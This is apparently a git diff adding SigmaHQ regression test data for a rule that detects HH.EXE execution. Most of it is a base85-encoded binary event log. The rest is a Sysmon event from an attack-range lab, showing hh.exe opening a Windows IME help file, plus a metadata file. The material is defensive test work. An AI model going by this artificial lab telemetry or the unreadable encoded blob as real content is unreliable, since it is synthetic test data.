zy(el5xJiF*Qk|Ex;Ps;7M9D{loT4VqqwbENSIL6!?BTd#f;G*4xPbp{_)i_k{*qzY zleOVaFU~r^YliQ~FXMEA4#$FnawqDsfG0W$x56;( zJf1Oio(+JK&Lwqlx1y&*^dJ^P_NtH^qjcfC19WnrHi)AQM-~(Yai6_6%fOTd@Y{zo zeO+o&Qw*Ii+m2_u)1T~_M@cJW%y6jc@WZTm#+gN| zv!Ikk?PXDiq)9x3++mJ5o19i5TG6YvqW9paf_P3V{&yf2^FZ6rJaT_lUH5!_?suLG?chu>7d9&Olc)jC=!0ZzqjZV&bmJRD*T`;Z z?(o~*f{8p$L%#;e!icBm^4Eu3uUV_deyWebk+EP#?LTX1v}O&5zO}pLIr*13|0s?o zOzRuvm5KS5yH~G0^i*!}K(NFTt@@<@csWFaTh;wV|Z;^N6NPM{|j&5NN z>U18;TqGXJ0-RXEcM(9qL423d>IVso4 zF1xOxk=4}>WNl$Ifv%~vWEmg^aG^Z%^Wv4H1sy$#u1W&{0!Rana&BxTot8*q-<}v? zJPlEaq?@FvCSQX|oybe$wT{9MVX!Qs5So48tC#x_g)`_GNZ$-Hx};c$c(+v{iJOqGA376e0C2mjOV2B zoZN)xt*ZN%jkB=1VzBBm!NLNavfVJx>OZ}L)zC%xJ10H_@jCbSl#I`*a zfo7=51!$`!DCJ@qrhXLYDHYoqHb3N{+3rWPsRB(GP9GXEcjj>vod<2+^!3uzfJswr zQMc_oCp~9bliJEK;Ne+|UyY{F z333L{e!d94=OHbWmt}mTsXEzRmF1>i^^LRWyh!sm&2!QZ$?P&nCZvMo9*J_|8SUTu$v057r;;B)6tTMWioFjsM<^xP=) zoXtyP1k^M|&W`{jZqO^O2{B`8Nqe~uRsnt!JO*)GhvOKI{Wx~xpidU&cfcMa0ARxS zSI~-fNR4G%(HGM)OOJ^EgnvasaWWsh6Z~7>>#5+F(~UuwX>Ui)@WOjetxtok(zgFm z{yNZ3TXAq_96es>LtWCZZc5#!Hxc9LH$Ky6iC)UibPg)tvlEEpwp~6Anwp}mmwCtS zEyXu0Wn5shmrh368J7To6KvpL!7y2uPb^d^&_9OXVLSi8~6KAHyx-W`YQF} z%W}~hsRK_smETeiehHN`7QLuQp$-3?URU&JVqAJGaSlWOCZ5sfS^IMraE~d|uc;4T z(&C*0&I=x|D|%7%BLvf-EHMT>26Bka^m#?=Y(f2}pR~?d4?<`!ELwT#UB+^;hUoFd z*#N!JdvT{r-DiolKbFo(AFi_adcCd+2u~jf`hk&V9<=Do#oXwUGPj()QOmR3^zG`! zFFDt#B=-X3)~_zz5|M$-^9@^s(KA5M=vTOc9)_Nbe!DMeS(sC@Kr1ydmHQEk)&e3c z)p`+A(+N^@>%@q4ee-^;3s=9Ynp>s7;_|r_)!rdX z&GDS`tQcli8O*D=_Juy{mHpNI=Tj%(Vg3Trqrdu}z=Pwjarpa;dl8CBSlZ}CLWdc8 z*A};JhPJx;x`13cSK(;fgkx82r72+@>)U_4rK5KyS7Nb@kD`RO=Xoba;`E9R#!bpG zn11w#r`2&k=-3vdcJ!Q;J+#Z|_?3)SEqc>*hFqz%)nj?PGhNvOHz0ejyO$urKfqze z@@6cLk*XQXmpQRmqhB+YUuP`;gJk(w{*V9GJ(j=GjOEQ$=JcTC!QLKTJ7{H!w1Z55X7FmC$`qOF z(rkm}9fu7dxWwL>%OtSVQe7TE329TPwEidzjc(B7n$jT7uTNtNC20edjZ+{m#!;G$ zQ{etVQ#gWaXZ>=}a?U*|f>)o8c&zzOnJKSft|XiQXM#!#osh4se511k?d)mnHyrglJ&0PwUvSKt0u z?pfh$tXW|k;3z+F8kf9Q^L2Kh$t^yx|EoXj|H^RUrI`=?>bup(KUn6I!S&y?lxg+% zj-i!Y!{p(!k+;78*;medYWE+47kmQy+w)L{)F~k*vhfx^!eCKxD@vNfx z9obiFL%U!#_K_TkHjZ>_vJ?n%GXFa2GRY?k004lUC*f9?fE+U>di zraBJm9C7*WJjQ3kin3$(^3XZ!R~~b;j1w&{fDX^eC0h4cR%>?0lDS*ay8E%wIs>T* zy&Ig~`-<(}Uam_&KDDD<=$b0g&@=b6UJiT0lly>`bfYN!66(aRDca^~vC-ZJnr4$; zzZH7r+mPaI5%q6d_)F`7qbYhBfJ+<6x?#``NmmSZ z>e^L9`+nN{Y!Uak%L-SGy^|zK`K8X( zzQ^+jc?F}EN1&DOKn?Gc!?;6hFP)(5J8uV_YCUnQpL4SQPr_dPxx>nXtk&nrM9-VUl+C7w`%KWUE8`;vD((JE_wg|bIy}{XXZ>YK_-dcF9Vag_uO;u zdG_Zy&slC|b5qrt=8%f~B-w&a{3fYnrN#szt9<73(*O6-7eDhuh8{3PfguVEQDBGy zLlhXIzz_w7C@@5UAqospV2A=k6d0mFuN0_kZYp2hvQ|m&KGtt1pM<2qzT=eI^!lvK zULV{`1-3Kkg?;|wuXbRXQd82EdOuaEzo+=GD76sfvyg`9>*tAH?zs(Z@^c{Clx-8?>~>&cUDDX#kX)jP-CvJIH9R_R!E z6ApwHKJARM_ zGxbjyY7rh$50b3``fD@@Bwc2TN=wR2R%t1L5o!_&MAG*iK1`iptE~a0T5v5XbA(Ds zfzD0DiHLaP6RB!0Dw0>tx{_k0By|8z4zO}sxg|x_YF@0>Rg&0XKm~C^72s#v#5A=4 z3?y4fA~qM`lTy`WoQUR}_GG#`9+x+RZ>^wXBk0bmscL)*$i5IK-?UFW>e3Ntbd9EI zIjV*L09n+CI+{GxBFfa!TQb5pC^vyTX=-e8AOq6k*^;W{Q9f!f#sdj5Au*Is%FIw1 zgyn0vNeseG{~V#pbv44#tRWGy)}dZimDTW!_cBx|p4b7vDJ>nq)I2wHm>Qi%qd>M7 z{9>$P)8(GW6kq5UA2LhWk;AiND414Dg4scTumW*eITbXS@#diF& zP^7E$G@4ej_G=~Spzvx-TOmN^aFw1M7^B6B#+aY4LPX0^vmS!fqTwdf#;8C_psVX7 zRG?KOLAoe6KmZxH%%=8#%$YSJyPwJoRT?K9h{=zx?ty0 z^cQjrcV=)*SL0Q>8jGt?037j~t}=8z+^);BaW+PcR&(%sP{zUfDdH3OXWYAoA$3Y z-}vbHzTQ7WYb8lRS{s=qU5#n~QguhMI20a_XgF#`;J6Ea`N@(y_I?rUWG!&`X&llg z^HXsS#ZOFog??;3%4s!A@Jk;}Dg1hC3M?5L<<&3Xn?`GyislxBcgvd zYVY62t33>?>;T0?sgp(lBG%2abv5hFlSf2|yqMjjQAuhv@0n`v+24D9w3;-kq*2K# zo%Ij4^~rq;eJVtXZi#Z5GzwxA6P7Aan^=aM;iOTiJ={})`gDGj?DgIJN*a~c1AUBZ zY6MMbc9KR7>!B`f7*&&+wi$KPP2D1kC+TDH90R!_6sz!ULH%YW_;_3!-UBA4B~pr# zJy$=46oW#MV$K%JwNBH*GHR&6Jv=5>G|+^1gt?nMr<_q+Exak+DxWlJq^afP_FOz` zmDVgzI$&f8lT-S<`qjWAX;h|hR3hm|dJv3-j8e}StQd;XPSNxltuyzJHjwbgZUIxDy+Uecv*P^}Sgg2HcGTeD7+KMBWG_Jh0 zIqK9!c!)Z1dNu9}=_r6tp02+Pf%5=mG0t<)&J=rJ8T5*_s8N>}q89JT(RUT&C|gZ+ z_@!-l!W`f;58BHkMl0)a1WeO^D6K?W z{LRNv39dm}R2eu;{uQBC70xMXrTAB-ujN7(@^Ds!`qO}C1+LD*{rM;>M4fDVjqOkd zD)7`o)MZQAcwUumu}as=!BZ-6Pad9Rpk!NxcwQdvD8`*Rs87i%!nYD7x%gXx7T8u1 z{^sNPc_=GH%>oNoIm%eS0A(dOF2g_4G*3T?_pxpfO8A#|=b{xJ73wDw)@hpC3pM2k z*(}{o1)j&}5Rx3-I=hCIxR(^=^YYMcF3PBRh5CuaG#}T%#9Xhj9G3~XWds#T6#MB^ z(z28YL_G?o0dwPXQ_HU&rZ`Os!uAyn%3_rXdsM3}2IH(CvN!Yw!3dA8V5R7@>Bo6Y zKh6*_2j5(LqeVZKH$`QzP^m42`Pq3zB?V7XGlaIOh($krsEAr8}{PJ+?i94wIgw>r43ko~7%sDu3)XS&VCPAHI+e66B?3{8 z^o*AGr>wjm2745qFPN!to{u5*{?|c3PgS6?^%1u z-_ZL+Yh!F*6V90gdY-f$Q2_B|5=TjKDifCmpKvQ9l0WA$ZHe^&A9?21VY&;$PfM%3(D7*uGgUyPA!^}&r0*b>)@e6PeHq4uW z(j6%59?oUKYq|ja9}eBJfKDbU(+^ zb#!!0##jTBf38wuzfFAc z5Y|_U$J3AfPwmf!ZC?48ySLx}LuixL@2xl-VEsPOr{A{&TI%=p__g}IPh9#v59Fdv zMxNBuY^D&Y*OfZ`R{`BMdQL57O0oh8Lh3VgRx zAzd{iTc1~5ZPdCNP@~7F*^oATI+du9Irmh{>T2@`ha}~4Knx!q*Zk+L759I8?je_4 zbJb+38g&Ymix&J5h%p!_gk!9Utj!^ zPp_|>abxNI76u-Fbonc%Jhr-|?V11Hk#Vr6*W(9XuP;FiB7S>cph~?)LPAD7lQA}4 zgMUMM^!e7KN07LHuqkAS?Wa?T$V!Qbvcu>7+WNewpb%SNb3?G%`3QzqBE66co1BXh z4wG^aH3z9R6N@pKmX9*#!W!^3cdW!+90DzX#b#>HOTmZF@yo{0sTum@02J%5L~b(( zPr#&wHye;=s}Z_&pk0&r3nHP{j#?bz2_kgitV9k8nW6saAOe+Isi*MG3YNDvhGqtr zF0RG@>T+gM^GkB`P+s5M99f=Im=#=DT`@BlWWDT?;{2>&ZTERzUQsUYo5$kgbzcBx$R~xX$D{BirujwN@*S)v&(HI?I z>GYAzK%WhoBrs7FbKW>4qkHxN7@#7j$H-{*d}SsGa(YaOO%Q#Y3Z|M*r^w~hUB7O6 zvI0|{_3sOTi;?Yl4PTMpuu<*kahm9yr;KU`?WiBuj&OXA0W4>yw&_I*%u4Qh?w&VS_xmvV$0A0D6c+`CI|edSBv_{Yh&AH^h< z%~ySU;Pr7VK#+dzqkxwB_yB%wzUsiZ@>TAxi7$6m3|T2bzoQ=i$RcK}iqY#~#>z}w z^pqM05jQ?v1dPp1;KG3TB-*sMS;>GIDQ@Zs<27rTqa1Jv*EhS|35n@8I_? zOULwEo=YGdMGoKd(NS95^|ymY{Gn=?O8+~5UkH$nQ?MRfAnQju+KIwJOP_3*lOI_6 z!K?vE?9fmcOE(7Sm=_CFOI_D0LT0H0T+oc2r%Od zuEwz|g(kr4(IBpcp=*VC44+LJghcwMJr8+z&%4hC5fj)^NXUq?OuH;UL=k*^I+X~v zIrjwKMgab)$gIMCNyH~WJ)u2$3KzCneK~M>dP%gt?CCtN3n6J)pcIJWLa4MfzaWcv z5T8?1l)BsEGeupq+{5R96D}`!r_8j#<82dm)*jVx@j;tMeS7EOp8oGY@cMs+Pyew7 zOzVGGXvVeJ9C+Y<14H^f`1M=X$%uISf0qXs;e+D=D7OA|Vve{GT&X7l-N)%_#euJM z>;7`gWZ z{Y;7LmLpOoFPmwgowX<5J%h(42m6l(Fv2kA>744m8+Eg&2;<%(5K zjLE}wc8!Mw1ZUY2p^ z&BZf3|8vN|`=4uJjU@g&47f4=3|m#r9ZRUb?4C10#WB<&KQ#FLkeCbCZ@Eo7c-K0W z2(XliU^~LHpdDUk)$r6Z=TMlA%6f=Nqdd$0QeS9S*CUH@uhpAp*6q8>)0?`sHz(dY z7YjY07(AYLVDX}ZPPzFTkN&gbydQgd^Mircn?nJD=nXRr)SKJzYxBZia3rImGYZ~( zuplh0FCWZ#h+Oi_%ox{$X2Af{i*r5u?jG{`Sb)sTcgO7Y_L3+|c%+$cNJRaZu&?}4f zyYHF}Be$IMt1(u$Fo!V(hl3zj+X*cTWrDh3g+HHCcwQzEP*QSDo!2x?&`fSv-oAUHpmpOf8-DTq&;ve(5 z%<6ONofK?^f{Co?sl@sojcbJw*J-chUk*$TXVaO@>^R?!XWY1k+4%64_(8p@{dCkY z8v!*U)T~7eU#gd!&q1$bF~ZMUbs~Bi^YH{`{kgb$ZG`_}+a_v(`4-}z&+~BO4X$$GN*Hb&V&=)0!`IOBuwQ9b#c&%E zmQ|sI-lhuPrxf+8K!0u*((QRBqmA%^8X2KxBx$zKGaa^t=o&JnhnXtr&EbKnsZN09Z}~5U(|UtL}wH1p&1|K4j4Asub)GGr`|J9_#>6{W-vw0HujD&3W~)cd^-d)%OMQXJfg-DfCvf$+l;k_7z;JK3_`H8!Yd_$# zIgMcksF~uiOj;Iv1R@7MC!~2vDfiw>{t4K5FeP>9KyVn?Z1viT)gjBu{jWt?tKH)+b)jhX?YI+!6|4|r+AL!Sdk*8$lcGe#O> z@i|s`V)(xSI@An)bEJnGWBcdqabxSX+Wrj=TOe`}FU*|QMytF*M|dWVp`Bx_xBD20 z3u;EBh<)|wA9cKs9`60tPyQ(LtbXv5)uWA{e9ITwNXr7GK;-a~hmH39WC6nG287n! zKa$IvxPLMy0&-DQK90G}m8l;tUgtzXUS%Ae2U;?Z&pq}^aLkET+;x&Zjyo_H<4)FO zNM8glaQYyhn1gG4BF{Ng!$nx^0uoe9r2Kykz|Mz5Fo4Z@`u3Y<@r+-fdb{yUcqBY{hsgd=%ZQu?ot9c;K$t$LpUZU1{3c%@8J`;>ll5+hzhj8?|Ylc?WGL2iVO*)4`;7#Tq+elmpmlISVvSTpG(s z0puO=prs^srp)XjY`hRPkv63P6c}uJS7NcFjc)`--1U_@Mjt2G6#_r-g;S2GXG@$ejKKx9~!kCesne$4BBe9~lmYAgh=k$du zah=g9eFTRs>C1C~7ms*8`0z7P3m54y)@58}A{55yj6aDf=Sa{?)NAh2qMC??`e(d^ z@r{GgzL>Zr1bz@ka>!ss{aXq6iJ#fUn_Of3Oi5+*LTgLg!svxHseyx!eL68`a_J& z-I++Qx5QZ4U5BOS>t#n{=N7~J>n5uh>$!}`8EsQ@JxEL+jxd{cqw}Z!JZ)@9nvm;Y zPL`Ps1BbNHTfZ+udell?j-AGas}IrNXTN_JE<9lS{a^f3XFv4&Igy5+^OC*%xU{S< z;EzD$==b|4(vY6f?{+YY|MKNoO7CMvJc;j^0M;y7e4lCBxY?UWBjcKTdVC`!6NhGd z_)5zHqd?@qx6C($LyvCye8vmVThyYAF&yP?CM2&!@r6_J4xx4oF>cpUD}FO=$>YbI zH*Wjp_cK00v0l{E)%6|@-?Y_EPD_W-$Q!JdVUQe?%gh_9_&Pc6$`}a^_wfp%QWiGB zfPvEi2@HB#>?xDHK`oQv^o zMh$E_7E!`k9%aX2|0H~$hBd`rXNq!1eOeF3?y&Orlgn!oD1S?>UHN;mCx6mnEcp}2 z`d$7aNj)Y`QjY;~D?sKq@vX%7Eqs;wW%YBUGwJo<6 zb*x{+@$|2+TU7VNq(8s^Z1KmOiD=ieeF299JWu7Dz(wY%aDg@FsqBScJBf+!3a!DH z(|d;Ib9}z%b0ll05r74kPp1;Gl@bwWhx2>M7YuOzPz|gUtt6)bFx4~-4q_TYfMS%@ z;oo$8%>cZAf43ku7W9VAf|w;{29+3idTYh`;s(<~9UPA_xl9sqkZlEm4JNqCal{=% zi%@rkKIa*)ninJS&L-T^rU&#_>Qs!voeFjNm!ZA_?CcsaeQQcgDNgXAepAmcz!JSj zte$`HoBbSmzNh21=ZDe12Vnc<)2XCoDG`Vqth#@gH$EkV3};mZSVi;)H=_t)26|pO zda03#x5*%8)JjxP9jT7PNE6?Y#^ZT7rod(6&0p-XRe|~DEp7$+oSXK}#GT9)ACK#Y z;45dWk9l>vzS+J|YM8fB<=ba24689!Lzf!?9TlPg&vQe^oRA+rW>8FK*1*T{Le?ONl#x5aCGSvs#*px5C)pNk%~StiP*p@z<}Y@f+F8)?h}JZ1z> zsO9H2Egx&J%#%#dR?+VHuN!J|OoMdt^w~&)UqX%jj?^lSlE=1@;abHpFH*wbLEGv{ zv(z+N<+nlJ6;g|~Nnj4wDvlS@;(M}855rM5Y8v@R?-IWxn>?d|)uW^b4JpktW8b}U zQ#uveGJv%U8T2&D^pQ))Cn+-`Hci*Wk&-dITE!wRGH{8JfvB)pstM_wB|Nx8@x zjLN(ke*0?ZY$&i0-p+VOb8fsN{SIju+dpy~B-%T2hesVo zNG=Lc^C$tXYu**{y(Y>M`j~eTQw}7KBnKEpl4jz2Bk98$?8A69qUmF>_oRpO28qjO zp%1+|pJDnT{z%_YF4CiuGKAD6HKtss64}2s_ENOd=tE?*XfX8f=_y(iej8sAX{{Nv zQ67!AaJNP&4yRxI?fLDlw8B2SfyQr{qOV5BjZD`_JvXeoLm5V0jNuuHaD@logx-!+ zJYNRP@#WRHHcMY8Z_Gc&{*2maX*o}eGD#md4VX0|{lCH9Lyc!S-y+MoGSi{|d;;Z{ z{W;3QRJ3b8C8~;X9^<{IQ1TNS?_Iq2qhI)+?)O|KYP`_39!gpk00kmPyvHgL<6|u_ z!^DI5j0q_9sKw{NtDinH@%XsLKc!{CM<8vWxu&QK3y6vTWwRZ;V&^UEq< zAc6Gfi&k8G%()c3AtYwieBTaA;Ym)D6qtst^I%VM4$f|crG5P}jGR$#=YT=SSVjng zID$1Yz_G3Q7w_J_O12f}&$U)G9_c|e1R{rMY#I^`^jJkH_S_JP>2Wd=Wc1Bf-pi~I zxx&E}^R;|E7cxZo5q~z@%F(QwZ&|twif-hH{%m*m=W+^=Ep+)aX<6S(-cB59=ONslre+)bJC(F7^bm*~^hojzX-ajt7U6F(@G7_XOg`g=Z3RZeRv<^;s@GMv z;Fzyl<(zfV=WKn%zda3<;{Btj@n_OY`wIjP6_#!d3%2$H-LBQ^-owXBrDZ^-KLU}1 zZky7)JY{UUNjT9P)krPVw+YXUb2ARF@6z+ACHoAfhb3c4;bS4@j6E_LPvSZOFW=0b zh&eZPIIbimrsoye3uHDdc1E7Pd#~@y@ex0Cob~9nEoUBd>>vAcSl+on=am@f{C!5# z+u{?X-`6|s_*_Fde-GRodvN(F7EUd5W?=F6PzeijoAHhan*N}`V)}=Y50Entp71=1 zoOv`dSr!9Tc+Z$4H5|2wk3t;L^e7~7nEZvDc~JQ|XO0CTb7tTPA5~$_wx>~WW<~fE z8PoM=Q+ThJ)08t09)Bjz91A@DOk8x%(&R7q%&4E4OV6x{m$_m-pipc06lg=_sF6EY zVYDc|EDqOz^*-iD-SlUVY4bhZG}#72dt*7c3P2>%Z&hYOMtH?=*FDk~J_p0tyl}as zzHp{Md~!+r$V<^&4{ols^h52}T>scQGj6;~p!Q28^_JQjnQt^>#LULzMRBcXOG63w z;59HBEn@!L53iR6By=LLEDay=(^H`4z<<(@o(iv8Y5nN=KfbRY{OALAyst7~ou=wk z(z28YL=HcCrEk2iXFtjnLkJRjh(Fkmhg z?V2fNb$T{2*Pu1){*o!JLDaT=hYy7;*Kw7M;i94YJ4#hBPQ;;Yo@80xXI=H znLQ65aiLDQ=PZRwl_xuX>&xu2ryqW)^5j3<$1|VLm0NzBMX1c^w`AL+bLqxLdAany z*sOR*y!`gxZ~e`&(HCOu(Sk?edPJ)G;|AkDxn4UQW7;G$w%=EM5083iOT}_Bqbu+b z&TyaU=Z@cJ`XdW^598}RXo&%5Czz44zRpD83?099^4q8AnNt1{oNzx7JL+J}K~44` zW)7V786UaqsoM)ij$IiEGhc~Zp^ zZ~TgW!n58S!!lQ0aSmtxQ?onn_$k&b=m}TE^(%71UI~|?;c_Fzv()9gpt%FpZL!l zncmrF8)5t*<4VcbRoVD*{F!@iU*DbI>d$`}#`E^Y`at=U947`toBpb_@uA zrDdUqKol2$X?22r{#ILjru_cd`x1|ji@(yc;3E(@@aY?W=>vM_FEW09{vK!PvGk?y z{eH`U@K;(EdI&@gdaz2k{xTZQ^Yiz3i_iF}U9Tn{9~Xb6Wx+=va^Mp`f6aJGZXEoD z-}Li$uBFHGKiS;gIUxL%mW3Vyk%J!5{M9qP{QR9~@!9EI$9b z`0Cokvh!(aW*FTT~yU%o@?-&nn|r`LsY z{}L`|_dcCUT9z__$UzVP{v|bfH-`<#a`FY{v0enk-p4fJ$^ODJ#Md}Ajzwy3jS>CTUo0?>4(C0`t?efP5bNdMNgS5;ke-5b+ho7^@z*4`J7 zZasAAMyx63{3S*_>1wP#-gdMh8($h5Bt3<$wU(~?|NFy!pzBy4U8TiXbQQ=xCv-*b zRp@#T=)1(y^^&rE-n_S4UbAX`bI|u@?0NkR1dM(L#&nBqr?mVWW|mCDRwM$ELqA{i z&EF`;o(r=u*1$21H5dt@^mQn{aIqPq5nK%4jI+f!ZnfnmJF)<;V3~z|_W6&a66SvD zIPd2R9Qkfi<}nsHpU(yP4f=XHt}nq@hl1bZtF7_@O(k+7%(0cCH_F#n@m~e5W$QEM zeJgM!5BbI_)Zt69_*xR)m8Y*T%ULP30StNsgnW{G#0i#PZ&m#0>ifF+)t~tYX<48Y zh#dT4mGJ(IUM1;|hn8A=7B&`tKk@ju{H3%k_y|M}eB$?)?9XuYv-fxi5u*6ZP2lq~ zOOJ1#xbL$2yZL+Nj2lZ&*niLKDdil({ zrE6LmTQ|1XwQp|k2(8P@t=rJvzM)}yXj3Q{3}ywFw1?Ve2ItqWL+kTvgQZJq=PX!U zU3+3(&51R&mGhbZ_%q0MX%PZ_}R{Gy7#MI*_HvC{s=@4 zy7PLtUeP0$`}OK1i_gI~UiXK@}YyPo6-Xn<9Eex-7T!Sn|a7 z@BDl~_$w_7Jp>{LJy<22zi>JA-SaMqSDnS@-&-HQEAjZa_$w_7J_3;gpT6;z<4nEV zO}zch&)<_RJKzfk>fC@T71_0=B^tO zkB^JL(z4(q5IOLPpT8y#lotno(cSa&x8Bm@;g2$J{Yy80`*U8rv@G-xh#d4t^7TWc zI%Y$O{_=OF#i#oIohx7N#-~5y329jX6o?%7uu6o#k+_JzQ9R?qm_Q-?-31VuEIoet-f@?`-ObBY(ECe^p0Bd_{@}?Yx4zenZ-3e=X<6_Uh#dH`N`$?_dfXrQ<$1Nm=i{dB z4Oe^0ac{5AKwa}tk_i@(yc;3E(@@QI(l^heAV#=+m|-S&!fS!?O>%0&|z zMh*ynrDdUqK;)nYtAz8H?kKE(+idZvIIiQ2#N*@Que2=q2t*Ei`pVz9;^XvWzy7YX z^froSx~pHm(_?4-ow=EqMNd?sD(`H%%pp{_X+@?Uo)N+<9H?>~8+{XMaIj7J3Lo4tnfH ze}S)zAfD1+=&<-c^{Zv4m3HIXpZx`CS@0Ez9Qd+IM7+_8VPn5MpJDN-esA4biO0t! z&(gBsBM>?8iC>irP!$$WZm{$?_@c>2A2%TUm6nAb0+E9r4*ssdz`UQo8!bLp zsNDI9$H&EAX<6_Qh#dIzjlW#k)VsY>rF)6JB3(9FdMy6Mo%=2y5dKQbLJxt+L62zu zmSSIrYCnHBTYNg79(`ou@p182S{8f+A_qS4^Vh^1apkXuhw1N`mLB^ont5hZH-Gyx zpDry6Jp>{LJ(3*xbmhex_y)f{I@{8t_QyB8eAa;QS6UW&2t*EgIQUyN zD>;n6U$XdYefh!n6OWIJztXbcBM>?8iJ!k_yd)lbgf(=2{(jlg<5%y#`=9d%gul|V z&_f_{(8Iys25bT4*WXTy&&Q)q$haWk__+8hEek#ZkprLj`Ahxf`%!w2CswF>;qNYh z@D)ps5rsk z!B-%1;L9oz{wQ;t8ts?ouUdTW{^rbU6OWHeo~32MM<8eZm%$d zPV5!wa-OBf+Yev+&>aK9UujwBArLv}!735@n}@07e*T_s@%i`3PyaUY__+8hEek#Z zkprLj`D^0Ic=B;w`-k!O0!xpKvg(`f9uWRY%R&!<$UzSWf5~w_e=oH7TtD(h+Y^tE zi@(yc;3E(@@aZdm&u z!Ix|5xQm+EO^y4gwPKA@i(b#f_e-<>v3fnzDwKt==4mzRbG1?kYlb+0&ZlxmH$E$b zbwy{Ov{BdPPDge6Wuj)~Ub8MWFvNN$_jTjiKJMJcHC22|xvL#Mdpe+KN4pBSNbXF- z7e-IP3ausBjb<)(p6Sb(5L{6X7;kgE+9g&V8bV{%d-Bj9>nf$i$n}2}SkJlaP!F;m zSNFST^7c=3UAJ-T*&20fGav3Il4cOZH;&ZlS6vQ!g@ z!rp^Dq*r@Ruihlz$^Yk|SKrv<{O`%mj<$AoN0xBAQ$_M$AnH+{qUGUnn?pVf624H| z#YWh_2G}s}*X_4)!7$6o{kgJGgX=my+o<;$)iy7PXVAv-h4Ue8V;fPsT|b+vM%(eP z31_sZn_&n0V(EIakV+kfXKks&nvE~EY8a> z%g#PqX-nTgev+@Z2uw!*?%Lk9D$3vhx7}`6GVqo0d;o$NTMXqWqeFUAwf{_2TGizS({ktO7suYX?kH zN+9czUxUZ5Vb&z$1k&|XNa5v{t~dST6;K}1{6L!`f)o}4an@4?n z=i$JgW~Fp5wLcE$;fuY(RN84cNDUMq*y78s*2A34z`u5wh1F1hzLmWlg2o`OL7Sa+ zn2RRVl%?b|5X3RSGcN<-;wQekwitgycm)Cb0UdaP|12rc)pZ4M`4BB9Vch{Xa8UbU z2JCo(gK-9clNM&fl1r1-KDf9Ai0fAqeHRCrDJm@~Gg+mj1V&(XmQqimFe!6{N=d=9 zS@5AQKu0qrkfaL^Ol1vhOpyXQu*Pg%fZZxm0;#%Sl`hb;fx5c*R;J5Qpqt!*gUmEF zHaTG4cJPL-iDN9(L*HDfiSiz&WBK}~VQMtq^n?TCA(L&5|F7Tl)RS9WuH7QI5>TC> z6h56w1lOE<0^OrJM!UsgU-x4fuqW_z)eF| zXa{RLBy`u@N}9UUpkd=yyL?T=v0?WZr|jKh+6zMOcz4jzYCB2^6YH$et~`jg*ntY+ z$#m)LG(|gmI&||%(RM}r>lN0%lx=+U#c2DoJNw%7Bp@$q{~8Dr5NTQ96NvgKAUmyp z3rXj?|#&nV#t^2u3-2rDZ||#9&$CU%wSl>PpL}{P%y|4}5yk z!6#{1AQXuD$fvt@n@`+hBzL#?#GU`Cd^O$CE=Iw?7o#pzCgGBBCX!cz^vD4A^&~&2 zKg@ewW%=^-!)w}}?9T7>=lGelEFcO*j(iuZgy-Ko)F_qV&);2b@p<5#FQ1!ud|dfE zX<6_Qh#dIzEq}*7D0?4Yf#GHT4l*$rdTaVa0t(BU)HNT%-|yH~dT;1}+kbz-y4kVz qhI;B(PfwlmBq@%U7{VoDX1S$)rux&y^8aSM_h&qCwi-7FKmQ9InZ!N- literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json new file mode 100644 index 000000000..e56eec8aa --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-27T00:11:22.294854Z" + } + }, + "EventRecordID": 33639600, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3380, + "ThreadID": 4420 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-27 00:11:22.292", + "ProcessGuid": "5AA13A44-B8AA-68FE-3F02-000000004102", + "ProcessId": 7784, + "Image": "C:\\Windows\\hh.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Microsoft® HTML Help Executable", + "Product": "HTML Help", + "Company": "Microsoft Corporation", + "OriginalFileName": "HH.exe", + "CommandLine": "\"C:\\Windows\\hh.exe\" C:\\Windows\\IME\\IMETC\\HELP\\IMTCTC14.CHM", + "CurrentDirectory": "C:\\Windows\\IME\\IMETC\\HELP\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000", + "LogonId": "0xc47e5", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=641EF54FAECFA4E912DB88075FD25AABDB233A79,MD5=44A6B0A791E00D169EC0FFCFF0A17EB3,SHA256=39811F6070E82E9AA67A4D3E6153A7CD70519DBBAC36067157C573E2F736AA9E,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C", + "ParentProcessGuid": "5AA13A44-B55F-68FE-1A01-000000004102", + "ParentProcessId": 8100, + "ParentImage": "C:\\Program Files\\Everything\\Everything.exe", + "ParentCommandLine": "\"C:\\Program Files\\Everything\\Everything.exe\" -startup", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml new file mode 100644 index 000000000..67ee105e9 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml @@ -0,0 +1,12 @@ +id: 627bc1e3-7961-4d77-96df-915627f8c3fc +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84 + title: HH.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx 